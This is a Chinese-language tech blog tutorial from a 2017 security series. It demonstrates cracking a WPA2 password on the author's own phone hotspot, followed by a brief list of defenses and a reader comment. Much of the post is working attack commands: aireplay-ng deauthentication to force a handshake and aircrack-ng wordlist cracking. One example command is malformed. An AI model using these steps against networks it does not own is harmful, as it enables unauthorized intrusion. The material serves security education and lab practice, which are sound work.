iT邦幫忙

2017 iT 邦幫忙鐵人賽
DAY 68
1
Security

資安x系統x絕對領域系列 第 44

[Day34]駭客思維xWiFi網路加密x破解

上一篇[Day32]駭客思維x教育不能等xWiFi網路安全中,得到不少前輩的指點與討論…
所以,想試著拋磚引玉來跟大家討論更深一點的東西 =v=+

這篇分享的是 HITCON GIRLS 組內的讀書會實作內容哦~
感謝講者Ashley 大大:)

無線網路加密協定

  • WEP

  • WPA

  • WP2

詳細的比較表待補

協定演化

http://ithelp.ithome.com.tw/upload/images/20170210/20103647wPvToSwCq9.jpg
圖片來源

看圖說故事

好哦我知道大家都很聰明一定能看得懂!!!!!
http://ithelp.ithome.com.tw/upload/images/20170210/20103647YUbcOkqcW3.png

http://ithelp.ithome.com.tw/upload/images/20170210/20103647tVnpHrAtBG.png

http://ithelp.ithome.com.tw/upload/images/20170210/20103647xASYB81ltY.png

實作驗證

由於手邊沒有適合的 WiFi 哦,就以手機熱點為例(WPA2)

  • 預備環境

    • Lab 環境(VM)
    • Kali Linux:https://www.kali.org/downloads/
    • 無線網卡(AP)
    • 密碼檔 請你的駭客朋友提供或找網路資源 邊緣人沒朋友嗚嗚
    • 有連線上 WiFi 的其他網路裝置或設備
    • 破解密碼時的耐心
  • 實作步驟

(1) 開啟 Kali Terminal 檢查連線狀態

lsusb 

檢查 USB 是否已連接上VM

airmon -ng

用於改變為無線網卡連線,以便其他工具順利使用
//若沒有抓到無線網卡請檢查VM 網路設定,請連接至VM中。

http://ithelp.ithome.com.tw/upload/images/20170211/20103647WfkLUyQ5hC.png

(2) airmon 監聽模式

http://ithelp.ithome.com.tw/upload/images/20170211/20103647TPTDU4UQDP.png

airmon-ng check

檢查是否有影響到的程序

airmon-ng check kill

把可能會影響到的程序殺掉

airmon-ng
airmon-ng start wlan0

若是第一次設定的話,系統可能說顯示不可用,請再重覆執行「airmon-ng」
這次就會給一個新的 interface

airmon-ng
airmon-ng start wlan0mon

好的,我們可以看到無線網卡有正常抓到此次實驗的手機熱點目標(AlexALiu)。

http://ithelp.ithome.com.tw/upload/images/20170211/20103647itwOMT3XYM.png

airodump-ng wlan0mon

執行分兩個區塊,上面的區塊是該網卡目前抓取到的連線
下面則是目前連線到該裝置 Client
將紅色框框內的東西複製起來,供後續指令使用

airodump-ng -c [channel number] --bssid [bssid] -w [/root/Destop/] [moniter interace]
airodump-ng -c 6 --FA:CF:9C:60:3A:B6 -w /root/Destop/ wlan0mon

將監聽檔的 Log 儲存在桌面,指定僅觀察這個連線

http://ithelp.ithome.com.tw/upload/images/20170211/20103647PuiudWn1bs.png
//WPA handshake 未找到 Key 時不會顯示是因為我擷圖的時候已經抓到 Key了 XD

另外再開一個 Terminal 當作發送

aireplay-ng -0 2 -a[router bssid] -c[client bssid] [monitoring interface name]
aireplay-ng -0 2 -a FA:CF:9C:60:3A:B6  -c  3C:A9:F4:8C:63:B8 wlan0mon

發送兩個封包去催眠裝置(3C:A9:F4:8C:63:B8),這個是我的筆電,催眠它說你已經過期了快重送密碼做握握手連線吧,讓它斷線後重新再連線,就可以在另外一個 Terminal 找到,在第一個 Terminal 中的監聽中就會有收到 WPA handshake (可能會跟STATION相同,但大部份會不同,嗚嗚實驗環境嘛)

aircrack-ng -a2 -b[rounter bssid] -w[path to wordlist] [/root/Destop]/*.cap
aircrack-ng -a2 -b FA:CF:9C:60:3A:B6 -w /root/Destop/pass.txt  /root/Destop/*.cap

//剛剛跟駭客朋友要來的密碼字典檔(pass.txt)我存在桌面哦 =v=+

http://ithelp.ithome.com.tw/upload/images/20170211/201036477g1GIF1A3J.png

然後,就找到這個連線的密碼了 :)
所以,知道密碼,你就可以連進內網了,那麼,連進內網你可以幹嘛呢?

… … …
嘖嘖,絕對領域系列文才不會跟你說的呢 =v=+

不過,其他無線網路的破解方式可以同理可證,大部份都可以用 airmon,不同的攻擊手法,就是要大量的做 handshake 封包去做解密,我們在實驗的時候,嘗試參數先下個 5000 次這樣嘗試看看,一樣需要大量的耐心。

防禦方式

  • 使用無線入侵偵測(WIPS)
  • 選用不易破解的加密架構
  • 設備認證機制
  • 使用者認證機制
  • 權限管理機制

自動工具

15款免費 WiFi(入侵破解)安全測試工具


上一篇
[Day33]DDos x手法x防禦姿勢
下一篇
[Day99]虎虎退賽聲明
系列文
資安x系統x絕對領域47

1 則留言

0
mytiny
iT邦大師 6 級 ‧ 2017-02-14 10:14:11

虎虎大真是用心,所提供的資訊確實豐富
在下因工作繁多,並未親身實作
但是白帽與黑帽駭客的思維模式不同
網路資安防禦應是需要多層次防護
(不同於User想法期待單一方案能解決全部)
因此即便WPA的key通訊破解,
駭客誘導連上他的基地台,
也不易造成資料外洩

例如:虎虎大所提到文章底的防禦方式
再可另外加強使用https的SSL加密憑證
或是使用各式VPN資料層加密等方式
因此在下認為無線網路其實沒有想像中的危險
倒是網管人員的架構設計與資安知識則是有待加強
以上所言純屬個人淺見,不當之處,望各方高手海涵

虎虎 iT邦新手 4 級 ‧ 2017-02-14 10:18:02 檢舉

謝謝 mytiny 大大 !!! >////<

我要留言

立即登入留言